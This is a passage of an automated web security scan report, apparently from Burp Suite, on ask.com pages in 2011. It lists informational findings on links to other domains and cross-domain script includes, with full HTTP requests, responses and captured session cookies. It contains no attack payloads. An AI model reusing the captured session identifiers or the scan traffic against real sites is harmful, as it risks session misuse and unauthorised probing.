Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.1.10.1300982764

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:05:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjM4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:38 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:38 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 94491

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
</span><a class="facebook sprite" href="http://www.facebook.com/AskDotCom"></a><a class="twitter sprite" href="http://twitter.com/askdotcom"></a>
...[SNIP]...
</span><a id="ftCareers" href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" class="txt3" >Careers</a>
...[SNIP]...
</span><a id="ftHelp" href="http://asksupport.custhelp.com/app/answers/list" class="txt3" target="_blank">Help</a>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" /></noscript>
...[SNIP]...
<noscript><iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0845DB8DB66BB2CFE0A8DECE14D761F3;u4=;u3=;u2=0;ord=-385647690?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
7.5. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /answers/7153311/is-nail-polish-bad-for-your-nails

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:09:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA5OjUyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 118233


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q="
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.askkids.com?o=0&l=dir"
class="txt3 b" style="">Kids</a>
...[SNIP]...
</a>, or, <a class="txt3 title b" href="http://asksupport.custhelp.com/app/answers/list" target="_blank">report a problem</a>
...[SNIP]...



<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...



<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>


<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...
7.6. http://www.ask.com/ja-ask-dialog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /ja-ask-dialog

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ja-ask-dialog?type=signin HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:05:29 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/
Content-Length: 68842



...[SNIP]...
<div class="txt3" style="margin-top:10px;clear:both">If you continue to have trouble accessing your account, please<a href="http://asksupport.custhelp.com/app/answers/list" target="_blank" style="margin-left:5px">contact us</a>
...[SNIP]...
7.7. http://www.ask.com/pictures  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pictures?q=Star+Jones&o=0&l=dir&qsrc=3015 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictureslanding?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA3LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:50 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 106391


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q=Star+Jones"
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.askkids.com?o=0&l=dir"
class="txt3 b" style="">Kids</a>
...[SNIP]...
<div id="di0"><img id="image0" src="http://media3.picsearch.com/is?GTs0MY3TLN6nxwYoFo0VntJdpD-JpfHKiKI5WmPIhR8" border="0" hspace="0" vspace="0"

width="128"
/></div>
...[SNIP]...
<div id="di1"><img id="image1" src="http://media2.picsearch.com/is?UxEYfkAWyo7kAQxGQc1HjkK5d0nBSYsvaXseGYeYrmg" border="0" hspace="0" vspace="0"


height="128" /></div>
...[SNIP]...
<div id="di2"><img id="image2" src="http://media5.picsearch.com/is?5t6T1C3x4FGyKv5IBxE3NHdrDznnHj1Z49qnDTU-wmU" border="0" hspace="0" vspace="0"


height="128" /></div>
...[SNIP]...
<div id="di3"><img id="image3" src="http://media3.picsearch.com/is?4EhQpufXvSdi_X3-krZCwFTLTY26zUxrG8ToZzKzihI" border="0" hspace="0" vspace="0"


height="128" /></div>
...[SNIP]...
<div id="di4"><img id="image4" src="http://media2.picsearch.com/is?YxpaNH9HSDoSw9H5oJweQvzdEzzaQHvms6xJJlarJdA" border="0" hspace="0" vspace="0"


height="128" /></div>
...[SNIP]...
<div id="di5"><img id="image5" src="http://media1.picsearch.com/is?uYkq8UoKbbEyqSFVvPxFwdnof3zBMnfztquGSliwJBY" border="0" hspace="0" vspace="0"

width="128"
/></div>
...[SNIP]...
<div id="di6"><img id="image6" src="http://media2.picsearch.com/is?HgmpqpRUhfsqvTJLx5Ot85nNjg_n_u49IGVg-V_IHwE" border="0" hspace="0" vspace="0"

width="128"
/></div>
...[SNIP]...
<div id="di7"><img id="image7" src="http://media3.picsearch.com/is?gtAamX0iO5iJN-n4VSRkM6_DvzX_0DYUCPtcWJ5xXKE" border="0" hspace="0" vspace="0"


height="128" /></div>
...[SNIP]...
<div id="di8"><img id="image8" src="http://media5.picsearch.com/is?oY5f4cPIHsRAHw9BaO3LxuzAbf1cpPSG82Vles2qOVo" border="0" hspace="0" vspace="0"

width="128"
/></div>
...[SNIP]...
<div id="di9"><img id="image9" src="http://media3.picsearch.com/is?ReB8hiNNxGYg2MKsjs8TM8t5wAdAU2GzTAyVZ2cU5fs" border="0" hspace="0" vspace="0"

width="128"
/></div>
...[SNIP]...
<div id="di10"><img id="image10" src="http://media2.picsearch.com/is?pCyoxpNWi32Pexkf0cXJPV3U5txt3AUJkrxGQrRemNY" border="0" hspace="0" vspace="0"


height="128" /></div>
...[SNIP]...
<div id="di11"><img id="image11" src="http://media4.picsearch.com/is?xtrbPaZy-PB1G22mZbkgxKZSq997yCl0mqOubVuWpE0" border="0" hspace="0" vspace="0"


height="128" /></div>
...[SNIP]...
<div id="di12"><img id="image12" src="http://media3.picsearch.com/is?jgAPFGTZ0c8ev6jKdZUKKjapInd6akDQkdoQE0hrZWc" border="0" hspace="0" vspace="0"


height="128" /></div>
...[SNIP]...
<div id="di13"><img id="image13" src="http://media5.picsearch.com/is?OyC2e6btfy1WLSfgSiuPbAAra4fOXQh40MerfMYTTxc" border="0" hspace="0" vspace="0"

width="128"
/></div>
...[SNIP]...
<div id="di14"><img id="image14" src="http://media1.picsearch.com/is?GD5gPj98B-swbe4ltiC8EH4_ZnXHnYcjvCWirsaFR3g" border="0" hspace="0" vspace="0"

width="128"
/></div>
...[SNIP]...
<div id="di15"><img id="image15" src="http://media1.picsearch.com/is?MQXy3aeGK1vPsSBpsvVJku72LVFMiH-OtfPmmPzM-t0" border="0" hspace="0" vspace="0"


height="128" /></div>
...[SNIP]...
<div id="di16"><img id="image16" src="http://media4.picsearch.com/is?h_G9gKfxqLXZKYM9u7o8YM1fjG465xYQ0XdbYxvkews" border="0" hspace="0" vspace="0"


height="128" /></div>
...[SNIP]...
<div id="di17"><img id="image17" src="http://media5.picsearch.com/is?I6Go4BTbpWN2CJV8LnF3FmG0sldz_LKdOQ_ItPdOozQ" border="0" hspace="0" vspace="0"


height="128" /></div>
...[SNIP]...



<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...



<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>


<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...
7.8. http://www.ask.com/pictureslanding  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictureslanding

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pictureslanding?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAwLVVUQw%3D%3D&po=0&pp=dir

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 24 Mar 2011 16:07:02 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 59137


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>


<tit
...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q="
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.askkids.com?o=0&l=dir"
class="txt3 b" style="">Kids</a>
...[SNIP]...
<div id="di0"><img id="image0" src="http://66.235.120.67:80/e?t=4934756863126158196" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di1"><img id="image1" src="http://66.235.120.67:80/e?t=8811184322805729450" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di2"><img id="image2" src="http://66.235.120.67:80/e?t=17074163800304751245" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di3"><img id="image3" src="http://66.235.120.67:80/e?t=13926407979329723328" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di4"><img id="image4" src="http://66.235.120.67:80/e?t=134778139101773407" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di5"><img id="image5" src="http://66.235.120.67:80/e?t=7053435246216489458" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
</script>
<script language="javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...



<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...



<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>


<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...
8. Cross-domain script include  previous  next
There are 4 instances of this issue:

8.1. http://www.ask.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; puser=pt=VHVlLTIyLU1hci0yMDExLTE2OjAzOjU4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:05:28 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user=o=0&l=dir; Domain=.ask.com; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/
Content-Length: 94462

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
8.2. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /answers/7153311/is-nail-polish-bad-for-your-nails

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:09:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA5OjUyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 118233


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
</script>


<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...
8.3. http://www.ask.com/pictures  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pictures?q=Star+Jones&o=0&l=dir&qsrc=3015 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictureslanding?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA3LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:50 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 106391


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
</script>


<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...
